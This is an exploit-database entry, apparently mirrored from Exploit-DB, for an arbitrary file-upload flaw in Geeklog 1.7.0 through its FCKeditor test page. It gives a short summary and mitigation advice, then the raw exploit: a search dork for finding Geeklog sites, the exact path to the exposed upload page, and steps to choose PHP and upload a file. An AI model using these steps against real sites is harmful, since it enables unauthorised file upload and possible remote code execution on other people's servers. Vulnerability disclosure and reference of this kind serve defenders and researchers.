header-logo
Suggest Exploit
vendor:
Geeklog
by:
Kubanezi AHG
7.5
CVSS
HIGH
File Upload
434
CWE
Product Name: Geeklog
Affected Version From: 1.7.2000
Affected Version To: 1.7.2000
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux Ubuntu 9.04
2010

Geeklog

This exploit allows an attacker to upload arbitrary files to the Geeklog website using the vulnerable FCKeditor component. By uploading a file with malicious content, an attacker can gain unauthorized access or execute remote code on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update Geeklog to the latest version or apply the necessary patches provided by the vendor. Additionally, restricting file upload functionality and implementing proper input validation can help prevent such attacks.
Source

Exploit-DB raw data:

###################################################                                               
#        db         88        88    ,ad8888ba,    #
#       d88b        88        88   d8"'    `"8b   # 
#      d8'`8b       88        88  d8'             #
#     d8'  `8b      88aaaaaaaa88  88              #
#    d8YaaaaY8b     88""""""""88  88      88888   #
#   d8""""""""8b    88        88  Y8,        88   #
#  d8'        `8b   88        88   Y8a.    .a88   #
# d8'          `8b  88        88    `"Y88888P"    #
#                                                 #
#                                                 #
###################################################
#
# Exploit Title: Geeklog
# Date: 18-10-2010
# Author: Kubanezi AHG
# Software Link: http://www.geeklog.net/
# Version: 1.7.0
# Tested on: Linux Ubuntu 9.04                       
# dork : inurl:"/geeklog/"    
# Contact: aldo@dibranet.net                       
#                                                    
####################################################

    exploit # geeklog/fckeditor/editor/filemanager/upload/test.html


first go to # http://site.com/Geeklog/


       then # http://site.com/Geeklog/fckeditor/editor/filemanager/upload/test.html
   
     select # "php"


Upload There Hacked.txt  And Copy Output Link 

#######################################################
            Exploit By Kubanezi
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Greetz : AHG-Crew , Mistreriozi , Boom ,Twilight , AutoruN , DoctorSQl 
          , Drake , Dj-Dukli , EragoN , Khaled , MossaD , BH-TREX

Navigation

Suggest Exploit

Services By CQR